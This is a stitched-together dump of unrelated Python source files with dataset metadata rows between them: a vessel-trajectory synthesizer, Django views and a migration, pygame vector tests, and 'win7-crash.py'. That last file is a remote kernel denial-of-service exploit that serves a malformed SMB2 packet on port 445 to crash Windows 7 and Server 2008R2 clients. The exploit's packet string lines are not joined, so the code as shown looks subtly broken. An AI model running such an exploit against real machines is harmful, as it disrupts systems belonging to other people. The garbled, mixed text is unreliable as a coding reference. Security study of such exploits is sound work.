                                port = BiasedNextStep(prev)
                            elif (pprev, prev) in [(30, 31), (34, 35)]:
                                port = AltBiasedNextStep(prev)
                            elif (pprev, prev) in [(21, 31), (25, 35)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(61, 71, 81)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(73, 74, 84), (76, 77, 87)]:
                                port = AltBiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(64, 74, 84), (67, 77, 87)]:
                                port = BiasedNextStep(prev)
                            else:
                                port = NextStep(prev)
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'ModifyThirdOrder')
# add mixed first and third order
def SynthesizeAddMixedOrder(NetworkPrefixCounter):
    """AddSophisticatedThirdOrder plus mixed-order rules around port 59:
    (39,49,59) -> Biased, and any other arrival at 59 -> MixedBiasedNextStep.

    Uses module globals `vessels` and `steps`.
    """
    trajectories = []
    for vessel in range(vessels):
        trajectory = []
        for step in range(steps):
            if len(trajectory) == 0:
                port = random.randint(0, 99)
            else:
                if len(trajectory) == 1:
                    prev = trajectory[-1]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        port = NextStep(prev)
                else:
                    if len(trajectory) == 2:
                        prev = trajectory[-1]
                        pprev = trajectory[-2]
                        if prev in [0, 3, 6]:
                            port = AltBiasedNextStep(prev)
                        else:
                            if (pprev, prev) in [(27, 28)]:
                                port = BiasedNextStep(prev)
                            elif (pprev, prev) in [(30, 31), (34, 35)]:
                                port = AltBiasedNextStep(prev)
                            elif (pprev, prev) in [(21, 31), (25, 35)]:
                                port = BiasedNextStep(prev)
                            else:
                                port = NextStep(prev)
                    else:
                        prev = trajectory[-1]
                        pprev = trajectory[-2]
                        ppprev = trajectory[-3]
                        if prev in [0, 3, 6]:
                            port = AltBiasedNextStep(prev)
                        else:
                            if (pprev, prev) in [(27, 28)]:
                                port = BiasedNextStep(prev)
                            elif (pprev, prev) in [(30, 31), (34, 35)]:
                                port = AltBiasedNextStep(prev)
                            elif (pprev, prev) in [(21, 31), (25, 35)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(61, 71, 81)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(73, 74, 84), (76, 77, 87)]:
                                port = AltBiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(64, 74, 84), (67, 77, 87)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(39, 49, 59)]:
                                # Third-order rule takes precedence over the
                                # first-order rule for port 59 below.
                                port = BiasedNextStep(prev)
                            elif prev == 59:
                                port = MixedBiasedNextStep(prev)
                            else:
                                port = NextStep(prev)
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddMixedOrder')
# modify mixed first and third order
def SynthesizeModifyMixedOrder(NetworkPrefixCounter):
    """AddMixedOrder with the port-59 rules flipped: (39,49,59) -> AltBiased
    and other arrivals at 59 -> AltMixedBiasedNextStep.

    Uses module globals `vessels` and `steps`.
    """
    trajectories = []
    for vessel in range(vessels):
        trajectory = []
        for step in range(steps):
            if len(trajectory) == 0:
                port = random.randint(0, 99)
            else:
                if len(trajectory) == 1:
                    prev = trajectory[-1]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        port = NextStep(prev)
                else:
                    if len(trajectory) == 2:
                        prev = trajectory[-1]
                        pprev = trajectory[-2]
                        if prev in [0, 3, 6]:
                            port = AltBiasedNextStep(prev)
                        else:
                            if (pprev, prev) in [(27, 28)]:
                                port = BiasedNextStep(prev)
                            elif (pprev, prev) in [(30, 31), (34, 35)]:
                                port = AltBiasedNextStep(prev)
                            elif (pprev, prev) in [(21, 31), (25, 35)]:
                                port = BiasedNextStep(prev)
                            else:
                                port = NextStep(prev)
                    else:
                        prev = trajectory[-1]
                        pprev = trajectory[-2]
                        ppprev = trajectory[-3]
                        if prev in [0, 3, 6]:
                            port = AltBiasedNextStep(prev)
                        else:
                            if (pprev, prev) in [(27, 28)]:
                                port = BiasedNextStep(prev)
                            elif (pprev, prev) in [(30, 31), (34, 35)]:
                                port = AltBiasedNextStep(prev)
                            elif (pprev, prev) in [(21, 31), (25, 35)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(61, 71, 81)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(73, 74, 84), (76, 77, 87)]:
                                port = AltBiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(64, 74, 84), (67, 77, 87)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(39, 49, 59)]:
                                port = AltBiasedNextStep(prev)
                            elif prev == 59:
                                port = AltMixedBiasedNextStep(prev)
                            else:
                                port = NextStep(prev)
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'ModifyMixedOrder')
################ main
# Module globals used by all Synthesize* functions (and inherited by the
# worker processes on fork-based platforms).
NetworkPrefixCounter = 0
OutputFolder = '../data/'
iterations = 10
vessels = 10000
steps = 100

if __name__ == '__main__':
    # every node has 40000*100/100=40000 movements on a 10x10 grid
    random.seed()
    # Run each synthesizer over its own block of `iterations` file prefixes,
    # one process pool per synthesizer (identical order to the original
    # hand-unrolled sequence of with-blocks).
    synthesizers = [
        SynthesizeNormal,
        SynthesizeAddFirstOrder,
        SynthesizeModifyFirstOrder,
        SynthesizeAddSecondOrder,
        SynthesizeAddSophisticatedSecondOrder,
        SynthesizeModifySecondOrder,
        SynthesizeAddThirdOrder,
        SynthesizeAddSophisticatedThirdOrder,
        SynthesizeModifyThirdOrder,
        SynthesizeAddMixedOrder,
        SynthesizeModifyMixedOrder,
    ]
    for synthesize in synthesizers:
        with concurrent.futures.ProcessPoolExecutor() as executor:
            executor.map(synthesize,
                         range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
        NetworkPrefixCounter += iterations
| 40.554649
| 124
| 0.445535
| 1,970
| 24,860
| 5.617767
| 0.071066
| 0.040661
| 0.051685
| 0.061083
| 0.855968
| 0.852715
| 0.835276
| 0.828409
| 0.822897
| 0.814132
| 0
| 0.054004
| 0.461464
| 24,860
| 612
| 125
| 40.620915
| 0.772632
| 0.034272
| 0
| 0.868952
| 0
| 0
| 0.009298
| 0.003556
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034274
| false
| 0
| 0.004032
| 0
| 0.056452
| 0.002016
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a52f69746f06d824c697bf2fe0383588ed5f0fd
| 1,436
|
py
|
Python
|
books_and_notes/professional_courses/Security/sources/extra_books/0day安全:软件漏洞分析技术第二版光盘资料/21探索ring0/shineast收集的内核漏洞/[2009-11-11][Microsoft][SMB2][nt][远程拒绝服务内核漏洞][36989]/win7-crash.py
|
gxw1/review_the_national_post-graduate_entrance_examination
|
8812779a7a4ce185a531d120562d5194b697c0c9
|
[
"MIT"
] | 640
|
2019-03-30T11:32:43.000Z
|
2022-03-31T14:05:18.000Z
|
books_and_notes/professional_courses/Security/sources/extra_books/0day安全:软件漏洞分析技术第二版光盘资料/21探索ring0/shineast收集的内核漏洞/[2009-11-11][Microsoft][SMB2][nt][远程拒绝服务内核漏洞][36989]/win7-crash.py
|
yyzVegst/review_the_national_post-graduate_entrance_examination
|
8812779a7a4ce185a531d120562d5194b697c0c9
|
[
"MIT"
] | 6
|
2019-07-22T01:57:24.000Z
|
2022-01-20T15:03:16.000Z
|
books_and_notes/professional_courses/Security/sources/extra_books/0day安全:软件漏洞分析技术第二版光盘资料/21探索ring0/shineast收集的内核漏洞/[2009-11-11][Microsoft][SMB2][nt][远程拒绝服务内核漏洞][36989]/win7-crash.py
|
yyzVegst/review_the_national_post-graduate_entrance_examination
|
8812779a7a4ce185a531d120562d5194b697c0c9
|
[
"MIT"
] | 212
|
2019-04-10T02:31:50.000Z
|
2022-03-30T02:32:47.000Z
|
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly crash
import SocketServer
packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
| 41.028571
| 104
| 0.690808
| 257
| 1,436
| 3.836576
| 0.486381
| 0.395538
| 0.529412
| 0.63286
| 0.228195
| 0.228195
| 0.22211
| 0.209939
| 0.209939
| 0.143002
| 0
| 0.248397
| 0.130919
| 1,436
| 34
| 105
| 42.235294
| 0.541667
| 0.255571
| 0
| 0.1
| 0
| 0.5
| 0.634241
| 0.614786
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.05
| null | null | 0.05
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6a5604f813557e58c05439d1d837d0c1093c86ef
| 3,439
|
py
|
Python
|
contentsummary/views.py
|
Bobstin/itcsummary
|
259d8f64e415a1c7cbc926752c717e307c09953f
|
[
"MIT"
] | null | null | null |
contentsummary/views.py
|
Bobstin/itcsummary
|
259d8f64e415a1c7cbc926752c717e307c09953f
|
[
"MIT"
] | 5
|
2021-02-27T13:23:58.000Z
|
2021-09-22T17:39:19.000Z
|
contentsummary/views.py
|
Bobstin/itcsummary
|
259d8f64e415a1c7cbc926752c717e307c09953f
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
import pdb
from .models import Session, Quote, KeyTakeaway, Speech
# Create your views here.
def example(request):
    """Render the example page for the lowest-numbered session."""
    first_session = Session.objects.all().order_by('number')[0]
    context = {'session': sessioninfo(first_session)}
    return render(request, 'contentsummary/example.html', context)
def nextSession(request, priornumber):
    """Render the session whose number immediately follows *priornumber*.

    Raises Session.DoesNotExist if there is no next session.
    """
    target_number = int(priornumber) + 1
    session = Session.objects.get(number=target_number)
    context = {'session': sessioninfo(session)}
    return render(request, 'contentsummary/session.html', context)
def singleSession(request, session_number):
    """Render one session using the all-sessions template (one-item list)."""
    session = Session.objects.get(number=session_number)
    context = {'sessions': [sessioninfo(session)]}
    return render(request, 'contentsummary/all_sessions.html',context)
def allSessions(request):
    """Render every session with its quotes, takeaways, and speakers."""
    sessions = [sessioninfo(session) for session in Session.objects.all()]
    context = {'sessions': sessions}
    return render(request,'contentsummary/all_sessions_no_resize.html',context)
def allSessionspt1(request):
    """Render all sessions, ordering sessions 1-26 before 27+."""
    # The original repeated the sessioninfo() dict literal twice;
    # delegate to the helper so the related-object bundle stays
    # consistent across all views.
    sessions = [
        sessioninfo(session)
        for session in Session.objects.filter(number__lte=26)
    ]
    sessions += [
        sessioninfo(session)
        for session in Session.objects.filter(number__gte=27)
    ]
    context = {'sessions': sessions}
    return render(request, 'contentsummary/all_sessions_no_resize.html', context)
def allSessionspt2(request):
    """Render all sessions, ordering sessions 27+ before 1-26.

    Mirror image of ``allSessionspt1``.
    """
    # Same dedup as allSessionspt1: build each entry via sessioninfo().
    sessions = [
        sessioninfo(session)
        for session in Session.objects.filter(number__gte=27)
    ]
    sessions += [
        sessioninfo(session)
        for session in Session.objects.filter(number__lte=26)
    ]
    context = {'sessions': sessions}
    return render(request, 'contentsummary/all_sessions_no_resize.html', context)
def sessioninfo(session):
    """Bundle a session with its related quotes, key takeaways and speeches.

    Returns a dict shaped for the contentsummary templates.
    """
    return {
        'session': session,
        'quotes': Quote.objects.filter(session=session),
        'keytakeaways': KeyTakeaway.objects.filter(session=session),
        'speakers': Speech.objects.filter(session=session),
    }
| 29.393162
| 81
| 0.690899
| 357
| 3,439
| 6.565826
| 0.154062
| 0.197099
| 0.179181
| 0.241894
| 0.819113
| 0.78029
| 0.78029
| 0.774317
| 0.774317
| 0.745734
| 0
| 0.004272
| 0.183193
| 3,439
| 117
| 82
| 29.393162
| 0.830189
| 0.011341
| 0
| 0.60241
| 0
| 0
| 0.145674
| 0.06239
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084337
| false
| 0
| 0.036145
| 0
| 0.204819
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a5e4266d43ef9d7e6ea49c05c79d50e85ba7861
| 4,685
|
py
|
Python
|
pixelpuncher/player/migrations/0007_auto_20151230_2157.py
|
ej2/pixelpuncher
|
8dd31090252c00772932c78ea21438d1e979f722
|
[
"BSD-3-Clause"
] | null | null | null |
pixelpuncher/player/migrations/0007_auto_20151230_2157.py
|
ej2/pixelpuncher
|
8dd31090252c00772932c78ea21438d1e979f722
|
[
"BSD-3-Clause"
] | null | null | null |
pixelpuncher/player/migrations/0007_auto_20151230_2157.py
|
ej2/pixelpuncher
|
8dd31090252c00772932c78ea21438d1e979f722
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-30 21:57
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema change (Django 1.9, 2015-12-30).

    Drops the old flat damage/percentage columns from ``skill`` and adds
    the dice-based combat fields (dice count/sides, hit/critical
    percentages, energy cost, bonuses, gain counters, skill/special
    typing) to both ``skill`` and ``playerskill``.

    NOTE(review): the spellings ``critial_percentage`` and
    ``critical_multipler`` are typos, but they match the actual column
    names in the database at this point in history — do NOT "fix" them
    here or the migration will no longer apply.
    """

    dependencies = [
        ('player', '0006_auto_20151228_0324'),
    ]

    operations = [
        # Remove the legacy fixed-damage fields from skill.
        migrations.RemoveField(
            model_name='skill',
            name='critial_percentage',
        ),
        migrations.RemoveField(
            model_name='skill',
            name='fail_percentage',
        ),
        migrations.RemoveField(
            model_name='skill',
            name='maximum_damage',
        ),
        migrations.RemoveField(
            model_name='skill',
            name='minimum_damage',
        ),
        # Dice-based combat fields on playerskill (per-player copies).
        migrations.AddField(
            model_name='playerskill',
            name='bonus',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='playerskill',
            name='critical_multipler',
            field=models.DecimalField(decimal_places=2, default=2.0, max_digits=4),
        ),
        migrations.AddField(
            model_name='playerskill',
            name='critical_percentage',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='playerskill',
            name='dice_sides',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='playerskill',
            name='energy_cost',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='playerskill',
            name='hit_percentage',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='playerskill',
            name='number_of_dice',
            field=models.IntegerField(default=0),
        ),
        # Matching dice-based fields on the skill template itself.
        migrations.AddField(
            model_name='skill',
            name='bonus',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='skill',
            name='critical_multipler',
            field=models.DecimalField(decimal_places=2, default=2.0, max_digits=4),
        ),
        migrations.AddField(
            model_name='skill',
            name='critical_percentage',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='skill',
            name='dice_sides',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='skill',
            name='gain_frequency',
            field=models.IntegerField(default=1),
        ),
        migrations.AddField(
            model_name='skill',
            name='gained_critical',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='skill',
            name='gained_critical_multipler',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='skill',
            name='gained_energy_cost',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='skill',
            name='gained_hit',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='skill',
            name='hit_percentage',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='skill',
            name='number_of_dice',
            field=models.IntegerField(default=1),
        ),
        migrations.AddField(
            model_name='skill',
            name='skill_type',
            field=models.CharField(choices=[(b'ATTK', b'Attack'), (b'SPCL', b'Special'), (b'HEAL', b'Heal')], default='ATTK', max_length=4),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='skill',
            name='special_type',
            field=models.CharField(blank=True, choices=[(b'energygain', b'Energy Gain'), (b'healthgain', b'Health Gain')], max_length=12, null=True),
        ),
        migrations.AddField(
            model_name='skill',
            name='special_value_1',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='skill',
            name='special_value_2',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='skill',
            name='special_value_3',
            field=models.IntegerField(default=0),
        ),
    ]
| 31.655405
| 149
| 0.542369
| 421
| 4,685
| 5.859857
| 0.206651
| 0.0985
| 0.21443
| 0.251723
| 0.809891
| 0.797325
| 0.750304
| 0.686664
| 0.648561
| 0.648561
| 0
| 0.020625
| 0.337673
| 4,685
| 147
| 150
| 31.870748
| 0.774412
| 0.013874
| 0
| 0.814286
| 1
| 0
| 0.143383
| 0.010396
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014286
| 0
| 0.035714
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6a648cf402e813c9224fe9d852d33a416e0fc027
| 77,060
|
py
|
Python
|
PyGame/.venv/Lib/site-packages/pygame/tests/math_test.py
|
esserafael/PythonStuff
|
97900e48f989b64ccde02f5d676f7f823ec0eed7
|
[
"MIT"
] | 1
|
2020-08-03T00:19:05.000Z
|
2020-08-03T00:19:05.000Z
|
PyGame/.venv/Lib/site-packages/pygame/tests/math_test.py
|
esserafael/PythonStuff
|
97900e48f989b64ccde02f5d676f7f823ec0eed7
|
[
"MIT"
] | 1
|
2021-08-23T20:43:21.000Z
|
2021-08-23T20:43:21.000Z
|
PyGame/.venv/Lib/site-packages/pygame/tests/math_test.py
|
esserafael/python-learning-stuff
|
97900e48f989b64ccde02f5d676f7f823ec0eed7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import unittest
import math
import platform
import pygame.math
from pygame.math import Vector2, Vector3
IS_PYPY = 'PyPy' == platform.python_implementation()
PY3 = sys.version_info.major == 3
class Vector2TypeTest(unittest.TestCase):
    def setUp(self):
        # Shared fixtures for every test: swizzling enabled, a zero
        # vector, the two unit basis vectors, two arbitrary vectors
        # v1/v2 together with their tuple (t1/t2) and list (l1/l2)
        # twins, and two plain float scalars s1/s2.
        pygame.math.enable_swizzling()
        self.zeroVec = Vector2()
        self.e1 = Vector2(1, 0)
        self.e2 = Vector2(0, 1)
        self.t1 = (1.2, 3.4)
        self.l1 = list(self.t1)
        self.v1 = Vector2(self.t1)
        self.t2 = (5.6, 7.8)
        self.l2 = list(self.t2)
        self.v2 = Vector2(self.t2)
        self.s1 = 5.6
        self.s2 = 7.8
def tearDown(self):
pygame.math.enable_swizzling()
def testConstructionDefault(self):
v = Vector2()
self.assertEqual(v.x, 0.)
self.assertEqual(v.y, 0.)
def testConstructionScalar(self):
v = Vector2(1)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 1.)
def testConstructionScalarKeywords(self):
v = Vector2(x=1)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 1.)
def testConstructionKeywords(self):
v = Vector2(x=1, y=2)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 2.)
def testConstructionXY(self):
v = Vector2(1.2, 3.4)
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
def testConstructionTuple(self):
v = Vector2((1.2, 3.4))
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
def testConstructionList(self):
v = Vector2([1.2, 3.4])
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
def testConstructionVector2(self):
v = Vector2(Vector2(1.2, 3.4))
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
def testAttributAccess(self):
tmp = self.v1.x
self.assertEqual(tmp, self.v1.x)
self.assertEqual(tmp, self.v1[0])
tmp = self.v1.y
self.assertEqual(tmp, self.v1.y)
self.assertEqual(tmp, self.v1[1])
self.v1.x = 3.141
self.assertEqual(self.v1.x, 3.141)
self.v1.y = 3.141
self.assertEqual(self.v1.y, 3.141)
def assign_nonfloat():
v = Vector2()
v.x = "spam"
self.assertRaises(TypeError, assign_nonfloat)
def testSequence(self):
v = Vector2(1.2, 3.4)
Vector2()[:]
self.assertEqual(len(v), 2)
self.assertEqual(v[0], 1.2)
self.assertEqual(v[1], 3.4)
self.assertRaises(IndexError, lambda : v[2])
self.assertEqual(v[-1], 3.4)
self.assertEqual(v[-2], 1.2)
self.assertRaises(IndexError, lambda : v[-3])
self.assertEqual(v[:], [1.2, 3.4])
self.assertEqual(v[1:], [3.4])
self.assertEqual(v[:1], [1.2])
self.assertEqual(list(v), [1.2, 3.4])
self.assertEqual(tuple(v), (1.2, 3.4))
v[0] = 5.6
v[1] = 7.8
self.assertEqual(v.x, 5.6)
self.assertEqual(v.y, 7.8)
v[:] = [9.1, 11.12]
self.assertEqual(v.x, 9.1)
self.assertEqual(v.y, 11.12)
def overpopulate():
v = Vector2()
v[:] = [1, 2, 3]
self.assertRaises(ValueError, overpopulate)
def underpopulate():
v = Vector2()
v[:] = [1]
self.assertRaises(ValueError, underpopulate)
def assign_nonfloat():
v = Vector2()
v[0] = "spam"
self.assertRaises(TypeError, assign_nonfloat)
def testExtendedSlicing(self):
# deletion
def delSlice(vec, start=None, stop=None, step=None):
if start is not None and stop is not None and step is not None:
del vec[start:stop:step]
elif start is not None and stop is None and step is not None:
del vec[start::step]
elif start is None and stop is None and step is not None:
del vec[::step]
v = Vector2(self.v1)
self.assertRaises(TypeError, delSlice, v, None, None, 2)
self.assertRaises(TypeError, delSlice, v, 1, None, 2)
self.assertRaises(TypeError, delSlice, v, 1, 2, 1)
# assignment
v = Vector2(self.v1)
v[::2] = [-1]
self.assertEqual(v, [-1, self.v1.y])
v = Vector2(self.v1)
v[::-2] = [10]
self.assertEqual(v, [self.v1.x, 10])
v = Vector2(self.v1)
v[::-1] = v
self.assertEqual(v, [self.v1.y, self.v1.x])
a = Vector2(self.v1)
b = Vector2(self.v1)
c = Vector2(self.v1)
a[1:2] = [2.2]
b[slice(1,2)] = [2.2]
c[1:2:] = (2.2,)
self.assertEqual(a, b)
self.assertEqual(a, c)
self.assertEqual(type(a), type(self.v1))
self.assertEqual(type(b), type(self.v1))
self.assertEqual(type(c), type(self.v1))
def testAdd(self):
v3 = self.v1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.v2.x)
self.assertEqual(v3.y, self.v1.y + self.v2.y)
v3 = self.v1 + self.t2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.t2[0])
self.assertEqual(v3.y, self.v1.y + self.t2[1])
v3 = self.v1 + self.l2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.l2[0])
self.assertEqual(v3.y, self.v1.y + self.l2[1])
v3 = self.t1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.t1[0] + self.v2.x)
self.assertEqual(v3.y, self.t1[1] + self.v2.y)
v3 = self.l1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.l1[0] + self.v2.x)
self.assertEqual(v3.y, self.l1[1] + self.v2.y)
def testSub(self):
v3 = self.v1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.v2.x)
self.assertEqual(v3.y, self.v1.y - self.v2.y)
v3 = self.v1 - self.t2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.t2[0])
self.assertEqual(v3.y, self.v1.y - self.t2[1])
v3 = self.v1 - self.l2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.l2[0])
self.assertEqual(v3.y, self.v1.y - self.l2[1])
v3 = self.t1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.t1[0] - self.v2.x)
self.assertEqual(v3.y, self.t1[1] - self.v2.y)
v3 = self.l1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.l1[0] - self.v2.x)
self.assertEqual(v3.y, self.l1[1] - self.v2.y)
def testScalarMultiplication(self):
v = self.s1 * self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.s1 * self.v1.x)
self.assertEqual(v.y, self.s1 * self.v1.y)
v = self.v1 * self.s2
self.assertEqual(v.x, self.v1.x * self.s2)
self.assertEqual(v.y, self.v1.y * self.s2)
def testScalarDivision(self):
v = self.v1 / self.s1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertAlmostEqual(v.x, self.v1.x / self.s1)
self.assertAlmostEqual(v.y, self.v1.y / self.s1)
v = self.v1 // self.s2
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.v1.x // self.s2)
self.assertEqual(v.y, self.v1.y // self.s2)
def testBool(self):
self.assertEqual(bool(self.zeroVec), False)
self.assertEqual(bool(self.v1), True)
self.assertTrue(not self.zeroVec)
self.assertTrue(self.v1)
def testUnary(self):
v = +self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.v1.x)
self.assertEqual(v.y, self.v1.y)
self.assertNotEqual(id(v), id(self.v1))
v = -self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, -self.v1.x)
self.assertEqual(v.y, -self.v1.y)
self.assertNotEqual(id(v), id(self.v1))
def testCompare(self):
int_vec = Vector2(3, -2)
flt_vec = Vector2(3.0, -2.0)
zero_vec = Vector2(0, 0)
self.assertEqual(int_vec == flt_vec, True)
self.assertEqual(int_vec != flt_vec, False)
self.assertEqual(int_vec != zero_vec, True)
self.assertEqual(flt_vec == zero_vec, False)
self.assertEqual(int_vec == (3, -2), True)
self.assertEqual(int_vec != (3, -2), False)
self.assertEqual(int_vec != [0, 0], True)
self.assertEqual(int_vec == [0, 0], False)
self.assertEqual(int_vec != 5, True)
self.assertEqual(int_vec == 5, False)
self.assertEqual(int_vec != [3, -2, 0], True)
self.assertEqual(int_vec == [3, -2, 0], False)
def testStr(self):
v = Vector2(1.2, 3.4)
self.assertEqual(str(v), "[1.2, 3.4]")
def testRepr(self):
v = Vector2(1.2, 3.4)
self.assertEqual(v.__repr__(), "<Vector2(1.2, 3.4)>")
self.assertEqual(v, Vector2(v.__repr__()))
def testIter(self):
it = self.v1.__iter__()
if PY3:
next_ = it.__next__
else:
next_ = it.next
self.assertEqual(next_(), self.v1[0])
self.assertEqual(next_(), self.v1[1])
self.assertRaises(StopIteration, lambda : next_())
it1 = self.v1.__iter__()
it2 = self.v1.__iter__()
self.assertNotEqual(id(it1), id(it2))
self.assertEqual(id(it1), id(it1.__iter__()))
self.assertEqual(list(it1), list(it2));
self.assertEqual(list(self.v1.__iter__()), self.l1)
idx = 0
for val in self.v1:
self.assertEqual(val, self.v1[idx])
idx += 1
def test_rotate(self):
v1 = Vector2(1, 0)
v2 = v1.rotate(90)
v3 = v1.rotate(90 + 360)
self.assertEqual(v1.x, 1)
self.assertEqual(v1.y, 0)
self.assertEqual(v2.x, 0)
self.assertEqual(v2.y, 1)
self.assertEqual(v3.x, v2.x)
